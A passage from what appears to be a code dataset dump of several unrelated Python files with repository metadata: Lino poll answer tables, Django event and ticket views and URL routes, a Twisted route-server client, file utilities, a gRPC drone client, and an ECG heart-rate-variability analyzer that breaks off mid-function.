polls_responses.get(poll.pk, [])\n elems += join_elems(\n [ar.obj2html(r, dd.fds(r.date))\n for r in responses], sep=', ')\n if poll.state == PollStates.published:\n elems += [' ', iar.ar2button()]\n #elems += [' ', iar.insert_button()]\n items.append(E.li(*elems))\n return E.div(E.ul(*items))\n\n\nclass AnswerChoice(dd.Model):\n\n class Meta(object):\n app_label = 'polls'\n verbose_name = _(\"Answer Choice\")\n verbose_name_plural = _(\"Answer Choices\")\n ordering = ['question__seqno']\n\n response = models.ForeignKey('polls.Response')\n question = models.ForeignKey('polls.Question')\n choice = models.ForeignKey(\n 'polls.Choice',\n related_name='answers', verbose_name=_(\"My answer\"),\n blank=True, null=True)\n\n @dd.chooser()\n def choice_choices(cls, question):\n return question.get_choiceset().choices.all()\n\n\nclass AnswerChoices(dd.Table):\n required_roles = dd.required(PollsStaff)\n model = 'polls.AnswerChoice'\n\n\n@dd.python_2_unicode_compatible\nclass AnswerRemark(dd.Model):\n\n class Meta(object):\n app_label = 'polls'\n verbose_name = _(\"Answer Remark\")\n verbose_name_plural = _(\"Answer Remarks\")\n ordering = ['question__seqno']\n\n response = models.ForeignKey('polls.Response')\n question = models.ForeignKey('polls.Question')\n remark = models.TextField(_(\"My remark\"), blank=True)\n\n def __str__(self):\n # return _(\"Remark for {0}\").format(self.question)\n return str(self.question)\n\n\nclass AnswerRemarks(dd.Table):\n required_roles = dd.required(PollsUser)\n model = 'polls.AnswerRemark'\n detail_layout = dd.DetailLayout(\"\"\"\n remark\n response question\n \"\"\", window_size=(60, 10))\n hidden_elements = dd.fields_list(AnswerRemark, 'response question')\n stay_in_grid = True\n\n\nclass AnswerRemarksByAnswer(AnswerRemarks):\n use_as_default_table = False\n hide_top_toolbar = True\n\n\nclass AllAnswerRemarks(AnswerRemarks):\n required_roles = dd.required(PollsStaff)\n\n\n@dd.python_2_unicode_compatible\nclass AnswersByResponseRow(object):\n \"\"\"Volatile object to represent the one and only answer to a given\n question in a given response.\n\n Used by :class:`AnswersByResponse` whose rows are instances of\n this.\n\n \"\"\"\n FORWARD_TO_QUESTION = tuple(\n \"full_clean after_ui_save disable_delete\".split())\n\n def __init__(self, response, question):\n self.response = response\n self.question = question\n # Needed by AnswersByResponse.get_row_by_pk\n self.pk = self.id = question.pk\n try:\n self.remark = AnswerRemark.objects.get(\n question=question, response=response)\n except AnswerRemark.DoesNotExist:\n self.remark = AnswerRemark(\n question=question, response=response)\n\n self.choices = AnswerChoice.objects.filter(\n question=question, response=response)\n for k in self.FORWARD_TO_QUESTION:\n setattr(self, k, getattr(question, k))\n\n def __str__(self):\n if self.choices.count() == 0:\n return str(_(\"N/A\"))\n return ', '.join([str(ac.choice) for ac in self.choices])\n\n\nclass AnswerRemarkField(dd.VirtualField):\n \"\"\"\n An editable virtual field.\n \"\"\"\n editable = True\n\n def __init__(self):\n t = models.TextField(_(\"My remark\"), blank=True)\n dd.VirtualField.__init__(self, t, None)\n\n def set_value_in_object(self, ar, obj, value):\n #~ e = self.get_entry_from_answer(obj)\n obj.remark.remark = value\n obj.remark.save()\n\n def value_from_object(self, obj, ar):\n #~ logger.info(\"20120118 value_from_object() %s\",dd.obj2str(obj))\n #~ e = self.get_entry_from_answer(obj)\n return obj.remark.remark\n\n\nclass AnswersByResponse(dd.VirtualTable):\n \"\"\"The table used for answering to a poll. The rows of this table are\n volatile :class:`AnswersByResponseRow` instances.\n\n .. attribute:: answer_buttons\n\n A virtual field that displays the currently selected answer(s) for\n this question, eventually (if editing is permitted) together with\n buttons to modify the selection.\n\n \"\"\"\n label = _(\"Answers\")\n editable = True\n master = 'polls.Response'\n column_names = 'question:40 answer_buttons:30 remark:20 *'\n variable_row_height = True\n auto_fit_column_widths = True\n slave_grid_format = 'summary'\n # workflow_state_field = 'state'\n\n remark = AnswerRemarkField()\n\n @classmethod\n def get_data_rows(self, ar):\n response = ar.master_instance\n if response is None:\n return\n for q in rt.modules.polls.Question.objects.filter(poll=response.poll):\n yield AnswersByResponseRow(response, q)\n\n @classmethod\n def get_slave_summary(self, response, ar):\n \"\"\"Presents this response as a table with one row per question and one\n column for each response of the same poll. The answers for\n this response are editable if this response is not registered.\n The answers of other responses are never editable.\n\n \"\"\"\n if response is None:\n return\n if response.poll_id is None:\n return\n AnswerRemarks = rt.modules.polls.AnswerRemarksByAnswer\n all_responses = rt.modules.polls.Response.objects.filter(\n poll=response.poll).order_by('date')\n if response.partner:\n all_responses = all_responses.filter(partner=response.partner)\n ht = xghtml.Table()\n ht.attrib.update(cellspacing=\"5px\", bgcolor=\"#ffffff\", width=\"100%\")\n cellattrs = dict(align=\"left\", valign=\"top\", bgcolor=\"#eeeeee\")\n headers = [_(\"Question\")]\n for r in all_responses:\n if r == response:\n headers.append(dd.fds(r.date))\n else:\n headers.append(ar.obj2html(r, dd.fds(r.date)))\n ht.add_header_row(*headers, **cellattrs)\n ar.master_instance = response # must set it because\n # get_data_rows() needs it.\n # 20151211\n # editable = Responses.update_action.request_from(ar).get_permission(\n # response)\n sar = Responses.update_action.request_from(ar)\n sar.selected_rows = [response]\n editable = sar.get_permission()\n\n kv = dict(response=response)\n insert = AnswerRemarks.insert_action.request_from(\n ar, known_values=kv)\n detail = AnswerRemarks.detail_action.request_from(ar)\n # editable = insert.get_permission(response)\n for answer in self.get_data_rows(ar):\n cells = [self.question.value_from_object(answer, ar)]\n for r in all_responses:\n if editable and r == response:\n insert.known_values.update(question=answer.question)\n detail.known_values.update(question=answer.question)\n items = [\n self.answer_buttons.value_from_object(answer, ar)]\n if answer.remark.remark:\n items += [E.br(), answer.remark.remark]\n if answer.remark.pk:\n items += [\n ' ',\n detail.ar2button(\n answer.remark, _(\"Remark\"),\n icon_name=None)]\n # ar.obj2html(answer.remark, _(\"Remark\"))]\n else:\n btn = insert.ar2button(\n answer.remark, _(\"Remark\"), icon_name=None)\n # sar = RemarksByAnswer.request_from(ar, answer)\n # btn = sar.insert_button(_(\"Remark\"), icon_name=None)\n items += [\" (\", btn, \")\"]\n\n else:\n other_answer = AnswersByResponseRow(r, answer.question)\n items = [str(other_answer)]\n if other_answer.remark.remark:\n items += [E.br(), answer.remark.remark]\n cells.append(E.p(*items))\n ht.add_body_row(*cells, **cellattrs)\n\n return E.div(ht.as_element(), class_=\"htmlText\")\n\n @dd.displayfield(_(\"My answer\"))\n def answer_buttons(self, obj, ar):\n # assert isinstance(obj, Answer)\n cs = obj.question.get_choiceset()\n if cs is None:\n return ''\n\n elems = []\n pv = dict(question=obj.question)\n\n ba = Responses.actions.toggle_choice\n if ba is None:\n raise Exception(\"No toggle_choice on {0}?\".format(ar.actor))\n sar = ba.request_from(ar)\n\n # print(\"20150203 answer_buttons({0})\".format(sar))\n\n # if the response is registered, just display the choice, no\n # toggle buttons since answer cannot be toggled:\n # 20151211\n sar.selected_rows = [obj.response]\n if not sar.get_permission():\n return str(obj)\n\n AnswerChoice = rt.modules.polls.AnswerChoice\n for c in cs.choices.all():\n pv.update(choice=c)\n text = str(c)\n qs = AnswerChoice.objects.filter(\n response=obj.response, **pv)\n if qs.count() == 1:\n text = [E.b('[', text, ']')]\n elif qs.count() == 0:\n pass\n else:\n raise Exception(\n \"Oops: %s returned %d rows.\" % (qs.query, qs.count()))\n sar.set_action_param_values(**pv)\n e = sar.ar2button(obj.response, text, style=\"text-decoration:none\")\n elems.append(e)\n return E.span(*join_elems(elems), class_=\"htmlText\")\n\n @classmethod\n def get_pk_field(self):\n return Question._meta.pk\n\n @classmethod\n def get_row_by_pk(self, ar, pk):\n response = ar.master_instance\n #~ if response is None: return\n q = rt.modules.polls.Question.objects.get(pk=pk)\n return AnswersByResponseRow(response, q)\n\n @classmethod\n def disable_delete(self, obj, ar):\n return \"Not deletable\"\n\n @dd.displayfield(_(\"Question\"))\n def question(self, obj, ar):\n if obj.question.number:\n txt = obj.question.NUMBERED_TITLE_FORMAT % (\n obj.question.number, obj.question.title)\n else:\n txt = obj.question.title\n\n attrs = dict(class_=\"htmlText\")\n if obj.question.details:\n attrs.update(title=obj.question.details)\n if obj.question.is_heading:\n txt = E.b(txt, **attrs)\n return E.span(txt, **attrs)\n\n\n@dd.python_2_unicode_compatible\nclass AnswersByQuestionRow(object):\n \"\"\"Volatile object to represent a row of :class:`AnswersByQuestion`.\n\n \"\"\"\n FORWARD_TO_RESPONSE = tuple(\n \"full_clean after_ui_save disable_delete\".split())\n\n def __init__(self, response, question):\n self.response = response\n self.question = question\n # Needed by AnswersByQuestion.get_row_by_pk\n self.pk = self.id = response.pk\n try:\n self.remark = AnswerRemark.objects.get(\n question=question, response=response).remark\n except AnswerRemark.DoesNotExist:\n self.remark = ''\n\n self.choices = AnswerChoice.objects.filter(\n question=question, response=response)\n for k in self.FORWARD_TO_RESPONSE:\n setattr(self, k, getattr(question, k))\n\n def __str__(self):\n if self.choices.count() == 0:\n return str(_(\"N/A\"))\n return ', '.join([str(ac.choice) for ac in self.choices])\n\n\nclass AnswersByQuestion(dd.VirtualTable):\n \"\"\"The rows of this table are volatile :class:`AnswersByQuestionRow`\ninstances.\n\n \"\"\"\n label = _(\"Answers\")\n master = 'polls.Question'\n column_names = 'response:40 answer:30 remark:20 *'\n variable_row_height = True\n auto_fit_column_widths = True\n\n @classmethod\n def get_data_rows(self, ar):\n question = ar.master_instance\n if question is None:\n return\n for r in rt.modules.polls.Response.objects.filter(poll=question.poll):\n yield AnswersByQuestionRow(r, question)\n\n @dd.displayfield(_(\"Response\"))\n def response(self, obj, ar):\n return ar.obj2html(obj.response)\n\n @dd.displayfield(_(\"Remark\"))\n def remark(self, obj, ar):\n return obj.remark\n\n @dd.displayfield(_(\"Answer\"))\n def answer(self, obj, ar):\n return str(obj)\n\n\nclass PollResult(Questions):\n \"Shows a summay of responses to this poll.\"\n master_key = 'poll'\n column_names = \"question choiceset answers a1\"\n\n # @classmethod\n # def get_data_rows(self, ar):\n # poll = ar.master_instance\n # if poll is None:\n # return\n # for obj in super(PollResult, self).get_request_queryset(ar):\n # yield obj\n\n @dd.virtualfield(dd.ForeignKey('polls.Question'))\n def question(self, obj, ar):\n return obj\n\n @dd.requestfield(_(\"#Answers\"))\n def answers(self, obj, ar):\n #~ return ar.spawn(Answer.objects.filter(question=obj))\n return AnswerChoices.request(known_values=dict(question=obj))\n\n @dd.requestfield(_(\"A1\"))\n def a1(self, obj, ar):\n cs = obj.get_choiceset()\n if cs is not None:\n c = next(iter(cs.choices.all()))\n #~ return Answer.objects.filter(question=obj,choice=c)\n return AnswerChoices.request(\n known_values=dict(question=obj, choice=c))\n\n\n","repo_name":"amir17688/google_data_p2","sub_path":"86937_models.py_C__Users_user_Desktop_data_2_data_google_data_lsaffre_lino_lino_modlib_polls.py","file_name":"86937_models.py_C__Users_user_Desktop_data_2_data_google_data_lsaffre_lino_lino_modlib_polls.py","file_ext":"py","file_size_in_byte":25617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29255575789","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render\n\nfrom TicketsReservation.views import view_event\nfrom forms import EventForm\nfrom forms import SectorForm\nfrom django.template import loader\nfrom django.http import HttpResponse\nfrom models import Event\nfrom TicketsReservation.models import Tickets\nfrom django.core.mail import EmailMessage\n\n\n@login_required\ndef add_event(request):\n if request.method == 'POST':\n form = EventForm(request.POST)\n if form.is_valid():\n event = form.save(commit=False)\n event.user = request.user\n event.save()\n\n return view_event(request, event.id)\n else:\n form = EventForm()\n return render(request, 'add_event.html', {'form': form})\n\n\n@login_required()\ndef add_sector(request, event_id):\n if request.method == 'POST':\n form = SectorForm(event_id, request.POST)\n if form.is_valid():\n sector = form.save(commit=False)\n sector.user = request.user\n sector.save()\n\n return view_event(request, event_id)\n else:\n form = SectorForm(event_id)\n return render(request, 'add_sector.html', {'form': form})\n\n\ndef confirm_cancel(request, event_id):\n template = loader.get_template('confirm_cancelation.html')\n context = {\n 'event': Event.objects.get(id=event_id)\n }\n return HttpResponse(template.render(context, request))\n\n\ndef cancel_event(request, event_id):\n event = Event.objects.get(id=event_id)\n tickets = Tickets.objects.filter(event_id = event_id)\n for ticket in tickets:\n content = 'We are sorry to inform that the event: ' + str(ticket.event.name) + ' was canceled.'\n mail = EmailMessage('Event canceled', content, 'janusze.pythona@gmail.com', [ticket.guest_email])\n mail.send()\n event.delete()\n return render(request, 'user_home.html')\n\n\ndef edit_event(request, event_id):\n event = Event.objects.get(id=event_id)\n form = EventForm(request.POST or None, instance=event)\n if form.is_valid():\n form.save()\n return view_event(request, event_id)\n return render(request, 'edit_event.html', {'form': form})\n\n","repo_name":"JanuszePythona/TicketsReservation","sub_path":"TicketsRes/EventCreator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8097098255","text":"\"\"\"This module is an interface to the Route Controller. It provides APIs to send\nnetwork events to the route controller and to receive control commands.\n\"\"\"\nimport eventlet\neventlet.monkey_patch()\n\nimport logging\nimport json\nimport time\nimport os\n\nfrom twisted.internet import reactor, protocol\nfrom twisted.internet.protocol import ReconnectingClientFactory\nfrom twisted.protocols.basic import LineReceiver\n\nlogger = logging.getLogger('fbgp.server_connect')\n\nclass RouteServerProtocol(LineReceiver):\n\n delimiter = b'\\n'\n\n def __init__(self, handler):\n self.handler = handler\n\n def connectionMade(self):\n self.handler({'msg_type': 'server_connected', 'msg': self.transport.getPeer()})\n\n def connectionLost(self, reason):\n self.handler({'msg_type': 'server_disconnected', 'msg': reason.getErrorMessage()})\n\n def lineReceived(self, raw):\n if type(raw) == bytes:\n raw = raw.decode('utf-8')\n self.handler({'msg_type': 'server_command', 'msg': raw})\n\n def send(self, msg):\n self.sendLine(msg)\n\n\nclass ServerConnect(ReconnectingClientFactory):\n\n def __init__(self, handler):\n self.proto = None\n self.running = False\n self.handler = handler\n self.server_addr = os.environ.get('FBGP_SERVER_ADDR') or 'localhost'\n self.server_port = int(os.environ.get('FBGP_SERVER_PORT') or 9999)\n self.send_q = eventlet.Queue(128)\n\n def send(self, data):\n \"\"\"Send data (string or dict) to the route server.\"\"\"\n if isinstance(data, dict):\n msg = json.dumps(data)\n else:\n msg = str(data)\n if not self.proto:\n self.send_q.put(msg)\n return False\n reactor.callFromThread(lambda: self.proto.send(msg.encode('utf-8'))) #pylint: disable=no-member\n return True\n\n def start(self):\n reactor.connectTCP(self.server_addr, self.server_port, self, timeout=10) #pylint: disable=no-member\n t = eventlet.spawn(reactor.run) #pylint: disable=no-member\n eventlet.sleep(0)\n return t\n\n def stop(self):\n reactor.stop() #pylint: disable=no-member\n\n def clientConntionFailed(self, connector, reason):\n logger.error('Failed to connect to gRCP server: %s' % reason)\n ReconnectingClientFactory.clientConnectionFailed(self, connector, reason)\n\n def clientConnectionLost(self, connector, reason):\n logger.error('Lost connection to gRCP server: %s' % reason)\n ReconnectingClientFactory.clientConnectionLost(self, connector, reason)\n\n\n def buildProtocol(self, addr):\n logger.info('Connected to gRCP server: %s' % addr)\n self.resetDelay()\n self.proto = RouteServerProtocol(self.handler)\n while not self.send_q.empty():\n try:\n msg = self.send_q.get(timeout=1)\n self.send(msg)\n except:\n break\n return self.proto\n","repo_name":"trungdtbk/fbgp2","sub_path":"fbgp/server_connect.py","file_name":"server_connect.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"6050807186","text":"import os\n\n_PROJECT_PATH = os.path.realpath(__file__)\nfor i in range(3):\n _PROJECT_PATH = os.path.dirname(_PROJECT_PATH)\n\n\ndef get_relative_path(rel_dir=None, file_name=None, make_dirs=True):\n if rel_dir is not None:\n result = os.path.join(_PROJECT_PATH, rel_dir)\n if make_dirs and not os.path.exists(result):\n os.mkdir(result)\n else:\n result = _PROJECT_PATH\n\n if file_name is not None:\n result = os.path.join(result, file_name)\n\n return result\n\n\ndef directory_traverse(relative_directory):\n file_list = []\n for dirpath, dirs, files in os.walk(relative_directory):\n file_list.extend([(dirpath, file) for file in files])\n return file_list\n\n\ndef import_module_from_file(base_path, module_path, module_name):\n # this won't work because import is called inside a function scope\n if module_name.endswith('.py') and not module_name.startswith('__'):\n import_path = module_path.replace(base_path, '').replace(os.path.sep, '.')\n\n exec(f'from {import_path}.{module_name.replace(\".py\", \"\")} import *')\n\n\nif __name__ == '__main__':\n base_path = get_relative_path('test_file_directory')\n files = directory_traverse(base_path)\n for m in files:\n import_module_from_file(base_path, *m) # this won't work because import is called inside a function scope\n print(files)\n\n","repo_name":"r-azh/TestProject","sub_path":"TestPython/test_file_directory/test_directory_traverse/directory_traverse_for_import.py","file_name":"directory_traverse_for_import.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32020196380","text":"#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n# Date : 2015-10-11\n# Author: Master Yumi\n# Email : yumi@meishixing.com\n\nimport hashlib\nfrom datetime import datetime\n\ndef md5(text):\n \"\"\"md5加密\"\"\"\n return hashlib.md5(text).hexdigest()\n\ndef to_utf8(text):\n \"\"\"将对象转化成str\"\"\"\n if isinstance(text, unicode):\n return text.encode(\"utf8\")\n if isinstance(text, datetime):\n return text.strftime(\"%Y-%m-%d %H:%M:%S\") \n return str(text)\n\ndef check_mobile(self):\n user_agent = self.request.headers.get(\"User-Agent\", \"\").lower()\n mobile_agent = ['iphone', 'android', 'phone', 'mobile', 'wap', 'netfront', 'java', 'opera mobi', 'opera mini',\n 'ucweb', 'windows ce', 'symbian', 'series', 'webos', 'sony', 'blackberry', 'dopod', 'nokia', 'samsung', \n 'palmsource', 'xda', 'pieplus', 'meizu', 'midp', 'cldc', 'motorola', 'foma', 'docomo', 'up.browser', \n 'up.link', 'blazer', 'helio', 'hosin', 'huawei', 'novarra', 'coolpad', 'webos', 'techfaith', 'palmsource', \n 'alcatel', 'amoi', 'ktouch', 'nexian', 'ericsson', 'philips', 'sagem', 'wellcom', 'bunjalloo', 'maui', 'smartphone', \n 'iemobile', 'spice', 'bird', 'zte-', 'longcos', 'pantech', 'gionee', 'portalmmm', 'jig browser', 'hiptop', \n 'benq', 'haier', '^lct', '320x320', '240x320', '176x220']\n for agent in mobile_agent:\n if user_agent.find(agent) > 0:\n return True\n return False\n\n","repo_name":"MrEleven/Unicorn","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27212039199","text":"from django.urls import path, re_path, include\nfrom rest_framework import routers\n\nfrom . import api\nfrom . import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'product', api.productViewSet)\nrouter.register(r'cart', api.cartViewSet)\nrouter.register(r'order', api.orderViewSet)\n\n\nurlpatterns = (\n # urls for Django Rest Framework API\n path('api/', include(router.urls)),\n)\n\nurlpatterns += (\n # urls for Django Rest Framework API\n re_path(r'^$', views.HomeView.as_view(), name='home'),\n)\n\nurlpatterns += (\n # urls for product\n path('product/', views.productListView.as_view(), name='app_product_list'),\n path('product/create/', views.productCreateView.as_view(),\n name='app_product_create'),\n path('product/detail//',\n views.productDetailView.as_view(), name='app_product_detail'),\n path('product/update//',\n views.productUpdateView.as_view(), name='app_product_update'),\n)\n\nurlpatterns += (\n # urls for cart\n path('cart/', views.cartListView.as_view(), name='app_cart_list'),\n path('cart/create/', views.cartCreateView.as_view(), name='app_cart_create'),\n path('cart/detail//',\n views.cartDetailView.as_view(), name='app_cart_detail'),\n path('cart/update//',\n views.cartUpdateView.as_view(), name='app_cart_update'),\n)\n\nurlpatterns += (\n # urls for order\n path('order/', views.orderListView.as_view(), name='app_order_list'),\n path('order/create/', views.orderCreateView.as_view(),\n name='app_order_create'),\n path('order/detail//',\n views.orderDetailView.as_view(), name='app_order_detail'),\n path('order/update//',\n views.orderUpdateView.as_view(), name='app_order_update'),\n)\n","repo_name":"rtgrrk/4tu","sub_path":"app/tu/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71439037047","text":"import sys\n\nimport grpc\n\nimport drone_pb2\nimport drone_pb2_grpc\n\ndef run():\n host = 'localhost:' + sys.argv[1]\n channel = grpc.insecure_channel(host)\n stub = drone_pb2_grpc.DirectionerStub(channel)\n resp = stub.Register(drone_pb2.IdReq())\n\n if resp.uid == -1:\n print('Already have 2 drones.')\n else:\n print('Client id [%d] connected to the server.' % resp.uid)\n coordinates = stub.GetCoordinate(drone_pb2.CoordinateReq(uid = resp.uid))\n for coordinate in coordinates:\n print('[received] moving to [%d, %d, %d]'\n % (coordinate.x, coordinate.y, coordinate.z))\n\nif __name__ == '__main__':\n run()\n\n","repo_name":"awang0523/cmpe273-spring18","sub_path":"assignments/assignment1/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26661560428","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 18 12:07:15 2020\n@author: Fjola Hyseni & Marius Keute\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport biosppy\nfrom biosppy import tools as st\nfrom scipy import signal\nimport pywt\n\n\nclass ecg_analyzer:\n def __init__(self, ECG, fs=1000):\n \"\"\"Parameters:\n *************\n ECG: 1d-array of raw ECG data\n fs: sampling frequency in Hz\n \n Attributes:\n ************\n phases: ECG phase estimation\n HR: instantaneous heart rate\n HRV_time_domain: different time domain HRV scores\n HRV_frequency_domain: different frequency domain HRV scores\n SD1SD2: Nonlinear HRV score generated from a Poincare recurrence matrix\n \"\"\"\n self.ECG = np.squeeze(ECG)\n self.fs = fs\n self.exclude, flip = artifact_removal(self.ECG, fs = fs)\n flip = decide_if_standard_orientation(self.ECG)\n if flip:#len(flip) > 0:\n self.ECG *= -1\n \n \n # plt.figure()\n # plt.plot(self.ECG)\n if np.sum(self.exclude) > 0:\n\n self.ECG = np.interp(np.arange(len(self.ECG)), np.where(np.invert(self.exclude.astype(bool)))[0], self.ECG[np.invert(self.exclude.astype(bool))])\n\n # plt.plot(self.ECG)\n \n self.ECG, r_peaks = get_signal_and_peaks(self.ECG, method = 'wavelet', fs = fs)\n \n self.r_peaks = np.delete(r_peaks, np.where((self.ECG[r_peaks] < np.percentile(self.ECG, 95)) & (self.ECG[r_peaks] > np.percentile(self.ECG, 5)))[0])\n \n self.NNi, self.HR = get_instantaneous_HR(self.r_peaks, len(self.ECG), fs)\n self.corRSA = get_corRSA(self.NNi, self.r_peaks, self.ECG)\n \n # plt.plot(self.r_peaks, self.ECG[self.r_peaks], 'or')\n\n self.categorical_phases, self.analytical_phases = get_ECG_phases(self.ECG, self.r_peaks)\n \n if np.sum(self.exclude) > 0:\n from scipy.interpolate import pchip\n Intp = pchip(np.where(np.invert(self.exclude.astype(bool)))[0], self.HR[np.invert(self.exclude.astype(bool))])\n self.HR = Intp(np.arange(len(self.HR)))\n \n \n # self.HR[self.exclude.astype(bool)] = np.nan\n self.categorical_phases[self.exclude.astype(bool)] = np.nan\n self.analytical_phases[self.exclude.astype(bool)] = np.nan\n \n self.HRV_time_domain = HRV_time_domain(self.NNi)\n self.HRV_frequency_domain = HRV_frequency_domain(self.HR[np.invert(np.isnan(self.HR))], self.fs)\n self.SD1SD2, self.logRSA = HRV_Poincare(self.NNi)\n def get_sliding_HRV(self, window_length = 5000, overlap = 2500):\n \"\"\" Calculate time-domain HRV indices in sliding windows\n Returns:\n ************\n sliding_HRV_t: Time-domain HRV indices for all windows\n sliding_HRV_f: Frequency-domain HRV indices for all windows\n timestamps: List of timestamps, giving the center of each window in\n seconds relative to the beginning of the ECG signal.\n Results will not be saved as class attributes, bust must be assigned\n to a new variable.\n \"\"\"\n startix = 0\n dt = overlap / self.fs\n ts = window_length/(2*self.fs)\n timestamps = []\n sliding_HRV_t = {}\n sliding_HRV_f = {}\n\n while (startix + window_length) < max(self.r_peaks):\n r_peaks_in_window = np.where((startix < self.r_peaks) & (self.r_peaks < (startix + window_length)))\n nni_in_window = self.NNi[r_peaks_in_window]\n tmp = HRV_time_domain(nni_in_window)\n if len(sliding_HRV_t) == 0:\n sliding_HRV_t = {key:[] for key in tmp.keys()}\n [sliding_HRV_t[key].append(tmp[key]) for key in tmp.keys()]\n \n tmp = HRV_frequency_domain(self.HR[startix:startix+window_length], self.fs)\n if len(sliding_HRV_f) == 0:\n sliding_HRV_f = {key:[] for key in tmp.keys()}\n [sliding_HRV_f[key].append(tmp[key]) for key in tmp.keys()]\n \n \n \n timestamps.append(ts)\n ts += dt\n startix += overlap\n \n return sliding_HRV_t, sliding_HRV_f, timestamps\n \n \n#%%\n\n\ndef get_corRSA(NNi, r_peaks, ECG):\n rpkamp = np.zeros(len(NNi))\n for n in range(len(NNi)):\n ix0 = max(0,r_peaks[n]-50)\n ix1 = min(len(ECG)-1, r_peaks[n]+50)\n rpkamp[n] = max(ECG[ix0:ix1])\n return np.corrcoef(NNi, rpkamp)[0,1]\n\ndef artifact_removal(ECG_data, fs = 1000):\n bandpass = signal.butter(4,(1,45),btype = 'pass',fs=fs)\n raw_p_peaks = _positive_peaks(signal.filtfilt(*bandpass,ECG_data), sampling_rate = fs, method = 'wavelet')\n raw_n_peaks = _positive_peaks(signal.filtfilt(*bandpass,- ECG_data), sampling_rate = fs, method = 'wavelet')\n\n # plt.plot(ECG_data)\n # plt.plot(raw_p_peaks, ECG_data[raw_p_peaks], 'or')\n # raw_n_peaks = _positive_peaks(-ECG_data, method = 'hamilton')\n r_peak = []\n r_p = []\n r_peaksepoch = []\n len_epoch = 10 * fs\n epoch_nr = int(np.ceil(len(ECG_data)/len_epoch))\n exclude = np.zeros(len(ECG_data))\n flip_orientation = np.zeros(len(ECG_data))\n min_raw_p_peak = raw_p_peaks[0]\n max_raw_p_peak = raw_p_peaks[-1]\n for i in range(epoch_nr):\n ECG_epoch = ECG_data[i*len_epoch: (i+1)*len_epoch]\n try: \n min_raw_p_peak = _find_closest_in_list(i*len_epoch, raw_p_peaks, direction= \"greater\", strictly = True)\n max_raw_p_peak = _find_closest_in_list((i+1)*len_epoch, raw_p_peaks, direction= \"smaller\", strictly = True)\n except ValueError:\n pass\n min_index = int(np.where(raw_p_peaks == min_raw_p_peak)[0])\n max_index = int(np.where(raw_p_peaks == max_raw_p_peak)[0])\n epoch_nni = np.diff(raw_p_peaks[min_index: max_index + 1])\n if min_raw_p_peak > (i+1)*len_epoch:\n exclude[i*len_epoch: (i+1)*len_epoch] = 1\n elif len(epoch_nni) < 7:\n exclude[i*len_epoch: (i+1)*len_epoch] = 1\n elif np.min(epoch_nni) < 400 or np.max(epoch_nni)> 1400:\n exclude[i*len_epoch: (i+1)*len_epoch] = 1\n elif len(ECG_epoch) < 903:\n print(\"Length of\", i+1,\"th epoch is smaller than 903; this does not allow R peak detection to occur at this epoch.\")\n else:\n # try: \n standard_orientation = decide_if_standard_orientation(ECG_epoch) \n if standard_orientation == False:\n flip_orientation[i*len_epoch: (i+1)*len_epoch] = 1\n r_peaksepoch = raw_n_peaks[min_index: max_index + 1]\n else:\n ECG_data[i*len_epoch: (i+1)*len_epoch] = ECG_data[i*len_epoch: (i+1)*len_epoch]\n r_peaksepoch = raw_p_peaks[min_index: max_index + 1]\n \n r_p.append(r_peaksepoch)\n r_peak = np.concatenate(r_p)\n r_peaks = [] \n for i in r_peak: \n if i not in r_peaks: \n r_peaks.append(i) \n r_peaks = np.array(r_peaks)\n r_peaks = r_peaks.astype(int)\n\n threshix = np.where((ECG_data > 3 * np.percentile(ECG_data, 99)) | (ECG_data < 3 * np.percentile(ECG_data, 1)))[0]\n if len(threshix) > 0:\n for marginval in np.arange(-250,250):\n ix = threshix + marginval\n \n exclude[np.delete(ix, np.where(ix >= len(exclude))[0])] = 1\n\n flipix = np.where(flip_orientation)[0]\n return exclude, flipix\n \n\n\ndef HRV_Poincare(NNi):\n #returns SD1/SD2, i.e. the variance ratio of the first two principal\n #components of the recurrence matrix (RR_i vs RR_i+1). logRSA is an\n #estimation of respiratory sinus arrythmia calculated from the recurrence\n #matrix\n# logRSA description in:\n# Moser, M., Lehofer, M., Sedminek, A., Lux, M., Zapotoczky, H. G., \n# Kenner, T., et al. (1994). Heart rate variability as a prognostic \n# tool in cardiology. a contribution to the problem from a theoretical \n# point of view. Circulation 90, 1078–1082. doi: 10.1161/01.cir.90.2.1078\n# \n \n \n from sklearn.decomposition import PCA\n recur = np.array([NNi[1:],NNi[:-1]]) \n p=PCA()\n comps = p.fit_transform(recur.T)\n SD1,SD2 = np.std(comps, axis = 0)\n logRSA = np.log10(np.median(np.abs(np.diff(recur, axis = 0))))\n return SD1/SD2, logRSA\n\ndef HRV_frequency_domain(HR, fs):\n \"\"\"Calculates frequency-domain HRV indices.\n Frequency band boundaries taken from:\n Shaffer, F., & Ginsberg, J. P. (2017). \n An overview of heart rate variability metrics and norms. \n Frontiers in public health, 5, 258.\n Returns nan for a given frequency band\n if the signal is too short to calculate the PSD.\n \"\"\"\n # from scipy.fftpack import fft\n # N = len(HR)\n # spc = fft(HR)\n # spc = spc[:int(N/2 +1)]\n \n # psd = (1/(fs*N)) * np.abs(spc)**2\n # psd[1:-1] *= 2\n # frx = np.linspace(0,fs/2, num = int(len(psd)));\n \n \n from scipy import signal, integrate\n # NNi = np.interp(x = range(total_signal_length),xp=r_peaks[:-1], fp=BPM)\n\n frx,psd = 